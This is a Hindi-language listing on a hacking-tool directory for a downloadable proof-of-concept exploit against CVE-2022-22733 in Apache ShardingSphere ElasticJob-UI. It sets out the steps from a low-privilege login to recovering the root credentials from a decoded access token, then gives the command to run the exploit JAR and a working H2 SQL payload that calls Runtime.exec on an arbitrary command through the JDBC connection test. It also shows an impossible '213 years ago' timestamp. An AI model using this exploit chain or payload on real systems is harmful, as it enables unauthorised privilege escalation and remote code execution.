Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-22733 — Apache ShardingSphere ElasticJob-UI विशेषाधिकार वृद्धि और RCE शोषण | Kitploit
उपकरण/GitHubGitHub/zeyad-azima/cve-2022-22733
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubzeyad-azima/cve-2022-22733

CVE-2022-22733

Apache ShardingSphere ElasticJob-UI विशेषाधिकार वृद्धि और RCE शोषण

रिपॉजिटरी देखें
213 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-22733

CVE-2022-22733 एक कमजोरी है जो Apache ShardingSphere ElasticJob-UI 3.0.0 और उससे नीचे के संस्करणों को प्रभावित करती है, यह कमजोरी Privilege Escalation की ओर ले जाती है। लेकिन, बढ़े हुए विशेषाधिकारों के दुरुपयोग से एक JDBC हमला किया जा सकता है और RCE प्राप्त किया जा सकता है। आप यहाँ से कमजोरी का विश्लेषण पढ़ सकते हैं और यहाँ से चरण-दर-चरण एक्सप्लॉइट लेखन ब्लॉग पढ़ सकते हैं।

elasticjob

एक्सप्लॉइट निम्नानुसार काम करता है:

  • निम्न-विशेषाधिकार वाले खाते से लॉगिन करें।
  • असुरक्षित रूप से उत्पन्न accessToken प्राप्त करें।
  • असुरक्षित रूप से उत्पन्न accessToken को डिकोड करें।
  • accessToken से डिकोड किए गए डेटा को पार्स करें।
  • पार्स किए गए डेटा से root खाता क्रेडेंशियल्स प्राप्त करें।
  • root खाता क्रेडेंशियल्स के साथ लॉगिन करें और एप्लिकेशन पर पूर्ण विशेषाधिकार प्राप्त करें।
  • JDBC हमले का दुरुपयोग करते हुए कनेक्शन परीक्षण अनुरोध भेजें।

उपयोग

आप JAR फ़ाइल यहाँ से डाउनलोड कर सकते हैं और स्रोत कोड यहाँ से प्राप्त कर सकते हैं।

  • jar निष्पादित करें:
root@kitploit:~
java -jar CVE-2022-22733.jar
  • SQL स्क्रिप्ट कोड:
root@kitploit:~
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')

डेमो

idea64_5Ru1DeWcKE

टूल डाउनलोड करें